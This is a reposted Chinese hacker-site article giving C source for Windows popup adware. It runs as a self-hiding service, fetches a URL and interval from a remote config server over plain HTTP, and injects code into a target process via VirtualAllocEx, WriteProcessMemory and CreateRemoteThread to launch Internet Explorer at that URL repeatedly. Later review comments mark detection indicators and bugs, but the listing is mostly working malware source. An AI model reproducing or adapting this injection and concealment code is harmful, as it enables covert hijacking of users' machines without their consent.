[推荐]一个弹窗口的流氓软件源码

一个弹窗口的流氓软件源码

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-5-19 10:24:32

 

/**************************************************************************************************
* Service entry point (ServiceMain) — NOTE: the listing below has been through a web renderer; the `L”…”` string quotes, `“kernel32″` and `0×0202` are garbled forms of `L"…"`, `"kernel32"` and `0x0202` and will not compile as shown.
**************************************************************************************************/
/*
 * Service entry point handed to the Service Control Manager (SCM).
 *
 * Flow: report SERVICE_RUNNING, then do all of the real work synchronously on
 * this thread — HideService(), GetConfig(), InjectCode() — and finally report
 * SERVICE_STOPPED. argc/argv are ignored.
 *
 * `serviceStatus`, `hServiceStatus`, LogToFile(), HideService() and
 * ServiceControl() are defined elsewhere in the file and are not visible
 * here; GetConfig() and InjectCode() are the two functions that follow.
 *
 * Review notes:
 *  - This is the persistence/launcher half of a self-hiding adware component:
 *    it runs as a service, calls HideService() (implementation not shown,
 *    presumably to hide the service from enumeration), pulls its behaviour
 *    from a remote server and injects into another process. Treat the
 *    service name SERVICE_NAME and the HideService() technique as the host
 *    indicators of this sample.
 *  - dwWin32ExitCode stays 0 no matter what happens: GetConfig() and
 *    InjectCode() return void and nothing here inspects their outcome, so the
 *    SCM always sees a clean stop.
 *  - If RegisterServiceCtrlHandler fails there is no status handle to report
 *    an error through, so the function simply returns and the SCM times the
 *    start out.
 *  - RUNNING is reported before the slow work begins, so SCM start timeouts
 *    are not an issue; STOP requests, however, arrive on the SCM's thread via
 *    ServiceControl() while this thread may be sleeping inside InjectCode()
 *    for minutes — whether that is handled depends on code not shown.
 */
void ServiceMain( DWORD argc, char *argv[] )
{
// Static part of the status record; only SERVICE_CONTROL_STOP is accepted.
serviceStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwServiceSpecificExitCode = 0;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

#ifdef DEBUG
LogToFile( L”ServiceMain: Try to register service\n” );
#endif

// Register the control handler; the cast hides any signature mismatch
// between ServiceControl() and LPHANDLER_FUNCTION.
hServiceStatus = RegisterServiceCtrlHandler( SERVICE_NAME, (LPHANDLER_FUNCTION)ServiceControl );
if( hServiceStatus == (SERVICE_STATUS_HANDLE)0 )
{
#ifdef DEBUG
WCHAR    tmp[256] = { 0 };
wsprintf( tmp, L”ServiceMain: Register service error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

// No handle -> cannot report failure to the SCM; just bail out.
return;
}

// Go straight to RUNNING; the lengthy work below happens after this.
serviceStatus.dwCurrentState = SERVICE_RUNNING;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

if( !SetServiceStatus( hServiceStatus, &serviceStatus ) )
{
#ifdef DEBUG
WCHAR    tmp[256] = { 0 };
swprintf( tmp, L”ServiceMain: Start service error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

return;
}

#ifdef DEBUG
LogToFile( L”ServiceMain: Start service ok\n” );
#endif

// Hide the service (implementation not shown in this listing).
HideService( SERVICE_NAME );

// Fetch sleep_time / url_path from the remote config server (see GetConfig).
GetConfig( );

// Inject CustomFunction + Arguments into TARGET_PROCESS (see InjectCode).
// Blocks — polls every 30 s until the target exists, then sleeps 2 min.
InjectCode( );

// Always reports a clean stop: failures above are not propagated into
// dwWin32ExitCode.
serviceStatus.dwCurrentState = SERVICE_STOPPED;
if( !SetServiceStatus( hServiceStatus, &serviceStatus) )
{
#ifdef DEBUG
WCHAR    tmp[256] = { 0 };
wsprintf( tmp, L”ServiceMain: Stop service error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif
}

#ifdef DEBUG
LogToFile( L”Stop service in main.\n” );
#endif

#ifdef DEBUG
LogToFile( L”ServiceMain Done.\n” );
#endif

return;
}

/*
 * Classic VirtualAllocEx / WriteProcessMemory / CreateRemoteThread injection
 * of CustomFunction() (defined elsewhere; REMOTE_FUNC_LENGTH raw bytes of it
 * are copied) into the process named TARGET_PROCESS. The remote thread
 * receives a copy of an `Arguments` struct (layout not visible here) holding
 * the addresses of LoadLibraryA/GetProcAddress plus the strings the payload
 * needs to resolve ShellExecuteA and RtlZeroMemory itself, the IE path, the
 * URL fetched by GetConfig() and the sleep interval.
 *
 * Reads the globals url_path and sleep_time (filled by GetConfig()), and
 * uses SetDebugPrivilege(), GetProcessIdByName(), TARGET_PROCESS, IE_PATH,
 * Arguments, CustomFunction and REMOTE_FUNC_LENGTH from the rest of the file.
 *
 * Review notes:
 *  - Detection surface: a service process that requests SeDebugPrivilege
 *    (SetDebugPrivilege, name-inferred), opens another process with
 *    PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,
 *    allocates PAGE_EXECUTE_READWRITE memory there and calls
 *    CreateRemoteThread on it. Each of those is a high-signal event.
 *  - `int bytes_write` is passed as `SIZE_T *`. On a 64-bit build SIZE_T is
 *    8 bytes, so WriteProcessMemory writes past the 4-byte int; only a
 *    32-bit build is safe. Declare it SIZE_T.
 *  - The strcpy()s into `arguments` have no visible bound; url_path may be up
 *    to 511 bytes (see GetConfig), so Arguments::MyUrl must be at least that
 *    large or the struct is overrun — cannot be confirmed from this listing.
 *  - Copying &CustomFunction as raw bytes assumes the function is
 *    position-independent, has no relocations and that &CustomFunction is the
 *    function body and not an incremental-link thunk (typical Debug builds).
 *    The "same address in every process" assumption for kernel32 exports
 *    also requires the target to load the same kernel32 image (same
 *    bitness, same boot).
 *  - hProcess and remote_thread are never closed: the cleanup block at the
 *    end is commented out and the early-return paths after OpenProcess
 *    also leak hProcess. Remote allocations are intentionally left in place
 *    since the remote thread keeps running.
 *  - The DWORD `dwPID = -1` relies on GetProcessIdByName() returning -1
 *    (i.e. 0xFFFFFFFF) as its not-found sentinel; that is inferred from the
 *    comparison, not visible here.
 */
void InjectCode( )
{
// Presumably enables SeDebugPrivilege so OpenProcess succeeds on
// processes owned by other users; implementation not shown.
if( ! SetDebugPrivilege() )
{
#ifdef DEBUG
LogToFile( L”Set Debug Privileges error.\n” );
#endif

return;
}

// Poll for the target process every 30 s until it appears.
DWORD    dwPID = -1;
while( 1 )
{
dwPID = GetProcessIdByName( TARGET_PROCESS );

if( -1 != dwPID )
{
#ifdef DEBUG
WCHAR    tmp[256] = { 0 };
wsprintf( tmp, L”Target process id is %d\n”, dwPID );
LogToFile( tmp );
#endif

break;
}

#ifdef DEBUG
LogToFile( L”Target process not found, sleep and continue.\n” );
#endif

Sleep( 30 * 1000 );
}

// Fixed 2-minute delay after the target is found; no reason is given in
// the listing (likely to let the target finish initialising).
Sleep( 2 * 60 * 1000 );

// Open the target process with exactly the rights needed below.
HANDLE hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwPID );
if( ! hProcess )
{
#ifdef DEBUG
LogToFile( L”OpenProcess error.\n” );
#endif

return;
}

// Resolve LoadLibraryA and GetProcAddress locally; both are exported by
// kernel32.dll, which the original author assumes sits at the same base
// address in every process (see review notes above for the caveats).
Arguments    arguments;

memset( (void *)&arguments, 0, sizeof(Arguments) );
HMODULE    hKernel = GetModuleHandleA( “kernel32″ );
if( hKernel == NULL )
{
#ifdef DEBUG
LogToFile( L”GetModuleHandle kernel32.dll error.\n” );
#endif

// NOTE(review): hProcess leaks on this and every following early return.
return;
}
arguments.MyLoadLibrary = GetProcAddress( hKernel, “LoadLibraryA” );
arguments.MyGetAddress = GetProcAddress( hKernel, “GetProcAddress” );

// Strings the remote code uses to resolve its own imports at run time,
// plus the program to launch, the URL to open and the delay between pops.
// None of these copies is bounded; Arguments field sizes are not visible.
strcpy( arguments.MyKernelDll, “kernel32.dll” );
strcpy( arguments.MyProgram, IE_PATH );
strcpy( arguments.MyShellDll, “Shell32.dll” );
strcpy( arguments.MyShellExecute, “ShellExecuteA” );
strcpy( arguments.MyUrl, url_path );
strcpy( arguments.MyZeroMemory, “RtlZeroMemory” );
arguments.SleepTime = sleep_time;

// Allocate writable memory in the target for the argument block.
Arguments *remote_agrument = (Arguments *)VirtualAllocEx(    hProcess,
0,
sizeof(Arguments),
MEM_COMMIT,
PAGE_READWRITE );
if( !remote_agrument )
{
#ifdef DEBUG
LogToFile( L”VirtualAllocEx for arguments error.\n” );
#endif

return;
}

#ifdef DEBUG
WCHAR tmp[256] = { 0 };
wsprintf( tmp, L”Remote Arguments’ addr: 0x%08x\n”, (DWORD)remote_agrument );
LogToFile( tmp );
#endif

// Copy the argument block into the target.
// NOTE(review): bytes_write is an int but is passed as SIZE_T* — only
// correct on a 32-bit build where sizeof(SIZE_T) == sizeof(int).
int    bytes_write;
if( !WriteProcessMemory( hProcess, (LPVOID)remote_agrument, (LPVOID)&arguments, sizeof(Arguments), (SIZE_T *)&bytes_write) )
{
#ifdef DEBUG
LogToFile( L”WriteProcessMemory for arguments error.\n” );
#endif
return;
}

// Allocate RWX memory in the target for the code itself.
LPVOID remote_func = VirtualAllocEx(    hProcess,
0,
REMOTE_FUNC_LENGTH,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE );
if( !remote_func )
{
#ifdef DEBUG
LogToFile( L”VirtualAllocEx for function error.\n” );
#endif

return;
}

#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Remote Function Address: 0x%08x\n”, remote_func );
LogToFile( tmp );
#endif

// Copy REMOTE_FUNC_LENGTH raw bytes starting at CustomFunction into the
// target; this only works if that code is position-independent (see notes).
if( !WriteProcessMemory( hProcess, (LPVOID)remote_func, (LPVOID)&CustomFunction, REMOTE_FUNC_LENGTH, (SIZE_T *)&bytes_write) )
{
#ifdef DEBUG
LogToFile( L”WriteProcessMemory for function error.\n” );
#endif

return;
}

#ifdef DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”WriteProcessMemory for function %d bytes\n”, bytes_write );
LogToFile( tmp );
#endif

// Start the copied code in the target with the argument block as its
// thread parameter.
HANDLE    remote_thread = CreateRemoteThread( hProcess, 0, 0, (LPTHREAD_START_ROUTINE)remote_func, remote_agrument, 0, 0 );
if ( !remote_thread )
{
#ifdef DEBUG
LogToFile( L”CreateRemoteThread for function error.\n” );
#endif

return;
}

#ifdef DEBUG
LogToFile( L”CreateRemoteThread for function ok\n” );
#endif

// The cleanup below is disabled in the original: the remote thread is left
// running with its memory in place, and both local handles are leaked.
// Closing the two handles (not the remote memory) would still be safe here.
/*
WaitForSingleObject( remote_thread, INFINITE );

if( NULL != remote_func )
{
VirtualFreeEx( hProcess, remote_func, REMOTE_FUNC_LENGTH, MEM_RELEASE );
#ifdef DEBUG
LogToFile( L”VirtualFreeEx for remote_func.\n” );
#endif
}
if( NULL != remote_agrument )
{
VirtualFreeEx( hProcess, remote_agrument, sizeof (Arguments), MEM_RELEASE);

#ifdef DEBUG
LogToFile( L”VirtualFreeEx for remote_agrument.\n” );
#endif
}

if( NULL != remote_thread )
{
CloseHandle( remote_thread );

#ifdef DEBUG
LogToFile( L”CloseHandle for remote_thread.\n” );
#endif
}
if( NULL != hProcess )
{
CloseHandle( hProcess );

#ifdef DEBUG
LogToFile( L”CloseHandle for hProcess.\n” );
#endif
}
*/

return;
}

/*
 * Fetch the runtime configuration from the operator's web server and store
 * it in the globals `sleep_time` and `url_path` (defined elsewhere in the
 * file; InjectCode() copies both into the injected Arguments block).
 *
 * Protocol: one cleartext HTTP/1.1 GET for CONFIG_PATH on CONFIG_HOST:80,
 * one recv() of at most 1000 bytes, and the body after the first blank line
 * is parsed as "<seconds>|<url>". On any failure the defaults
 * DEFAULT_SLEEP_TIME / DEFAULT_URL are used; the caller never sees an error.
 *
 * Review notes (defects visible in this block, left unchanged here):
 *  - The configuration is fetched unauthenticated over plaintext HTTP and
 *    used without validation, so whoever controls CONFIG_HOST, its DNS
 *    answer or the network path picks the URL and interval handed to the
 *    injected code. For defenders: the request is the network indicator —
 *    `GET CONFIG_PATH` with `Host: CONFIG_HOST` from a service process.
 *  - recv()'s return value is discarded and `if( !recv_buff )` tests the
 *    address of a local array, which is never NULL; a closed or failed
 *    connection is not detected, the buffer simply stays all-zero.
 *  - A single recv() assumes headers and body arrive in one segment; a
 *    split response parses as "no body" and falls back to the defaults.
 *  - tmp_time is 32 bytes but the guard is `> 32`, so a 32-character prefix
 *    is strncpy'd with no terminating NUL before atoi() reads it
 *    (the guard should be `>= sizeof tmp_time`).
 *  - url_path's size is not visible here; the `>= 512` check makes the
 *    strcpy safe only if url_path holds at least 512 bytes.
 *  - atoi() accepts junk, zero and negative input; sleep_time is never
 *    range-checked. tmp_url is declared and never used.
 *  - The DEBUG-only wsprintf on the socket() failure path passes the int 80
 *    for a %s and has no conversion for GetLastError(); it would fault in a
 *    DEBUG build.
 *  - `0×0202` is a rendering artifact of `0x0202` (Winsock 2.2).
 */
void GetConfig( )
{
#ifdef DEBUG
WCHAR    tmp[256] = { 0 };
#endif

WSAData                wsa;
struct sockaddr_in    sin;

memset( &sin, 0, sizeof(struct sockaddr_in) );
if( WSAStartup( 0×0202, &wsa ) != 0 )
{
#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”WSAStartup error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

goto getconfig_error;
}

// Resolve the config host (IPv4 only; first address is used).
struct hostent *phost = gethostbyname( CONFIG_HOST );
if( phost == NULL )
{
#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Resolv config host name error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

WSACleanup( );
goto getconfig_error;
}

// h_length is trusted to fit sin_addr (4 bytes); true for AF_INET results.
memcpy( &sin.sin_addr , phost->h_addr_list[0] , phost->h_length );
sin.sin_family = AF_INET;
sin.sin_port = htons( 80 );

#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );

WCHAR ip[256] = { 0 };
MULTI_TO_WIDE( ip, inet_ntoa( sin.sin_addr ));

wsprintf( tmp, L”Resolv config host name ok: %s\n”,ip );
LogToFile( tmp );
#endif

SOCKET    sock = socket( AF_INET , SOCK_STREAM , 0 );
if( sock == INVALID_SOCKET )
{
#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );
// NOTE(review): format/argument mismatch — 80 is passed for %s and the
// GetLastError() argument has no conversion; fix if DEBUG is ever built.
wsprintf( tmp, L”Connect to %s:%s error: \n”, ip, 80, GetLastError() );
LogToFile( tmp );
#endif

WSACleanup( );
goto getconfig_error;
}

// Plain TCP to port 80; no TLS, no timeout (connect() may block a while).
int ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( SOCKET_ERROR == ret )
{
#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Connect error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

closesocket( sock );
WSACleanup( );
goto getconfig_error;
}

// Minimal HTTP/1.1 request; CONFIG_PATH/CONFIG_HOST are compile-time
// strings, and sprintf() relies on them fitting in 512 bytes.
char send_buff[512] = { 0 };
sprintf( send_buff, “GET %s HTTP/1.1\r\nHost: %s\r\nAccept: */*\r\n\r\n”, CONFIG_PATH, CONFIG_HOST );

#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );

WCHAR tmp2[256] = { 0 };
MULTI_TO_WIDE( tmp2, send_buff );
wsprintf( tmp, L”Send request to get config:\n %s\n”, tmp2 );
LogToFile( tmp );

#endif

ret = send( sock, send_buff, strlen(send_buff), 0 );
if( SOCKET_ERROR == ret )
{
#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );
wsprintf( tmp, L”Send request error: %d\n”, GetLastError() );
LogToFile( tmp );
#endif

closesocket( sock );
WSACleanup( );
goto getconfig_error;
}

#ifdef    DEBUG
LogToFile( L”Send request ok!\n” );
#endif

// One read of up to 1000 bytes into a zeroed 1024-byte buffer, so the
// result is always NUL-terminated — but the byte count is thrown away.
char recv_buff[1024] = { 0 };
recv( sock, recv_buff, 1000, 0 );
// NOTE(review): always false — recv_buff is an array, its address is
// never NULL. The intended check is on recv()'s return value.
if( !recv_buff )
{
closesocket( sock );
WSACleanup( );
goto getconfig_error;
}

closesocket( sock );
WSACleanup( );

// Body starts after the first CRLFCRLF; the status line is never checked.
char *content = strstr( recv_buff, “\r\n\r\n” );
if( !content )
{
goto getconfig_error;
}

content += strlen(”\r\n\r\n”);

#ifdef    DEBUG
memset( tmp, 0, sizeof(tmp) );

WCHAR c[256] = { 0 };
MULTI_TO_WIDE( c, content );

wsprintf( tmp, L”Config content is:\n%s\n”, c );
LogToFile( tmp );
#endif

// Expected body: "<seconds>|<url>".
char *split_flag = strstr( content, “|” );
if( !split_flag )
{
goto getconfig_error;
}

char tmp_time[32] = { 0 };
char tmp_url[512] = { 0 };
// NOTE(review): off by one — a prefix of exactly 32 chars passes this
// guard and fills tmp_time with no terminator.
if( split_flag - content > 32 )
{
sleep_time = DEFAULT_SLEEP_TIME;
}
else
{
strncpy( tmp_time, content, split_flag - content );
sleep_time = atoi( tmp_time );
}

// split_flag + 1 is at most 510 chars + NUL here; safe only if url_path
// (size not visible) is at least 512 bytes.
if( strlen( split_flag ) >= 512 )
{
strcpy( url_path, DEFAULT_URL );
}
else
{
strcpy( url_path, split_flag + 1 );
}

return;

// Every failure path lands here: built-in defaults, no error reported.
getconfig_error:

sleep_time = DEFAULT_SLEEP_TIME;
strcpy( url_path, DEFAULT_URL );

return;
}
